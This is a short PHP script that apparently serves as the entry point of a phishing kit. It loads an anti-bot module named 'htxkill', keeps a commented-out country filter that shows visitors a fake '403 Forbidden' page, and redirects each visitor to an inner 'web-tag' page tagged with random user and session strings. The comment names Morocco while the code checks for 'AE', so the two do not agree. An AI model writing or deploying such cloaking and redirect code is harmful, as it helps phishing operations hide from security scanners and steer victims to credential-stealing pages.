<?php

include "./web-tag/root/functions.php";
include "antiw9/htxkill.php";


/* ban any ip not from morocco

if($code !== "AE"){
    header('HTTP/1.0 403 Forbidden');
    die('<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You dont have permission to access / on this server.</p></body></html>');
            exit();
}


*/


header("location: web-tag/index.php?&userID={$randString}&ue={$randStringC}");
?>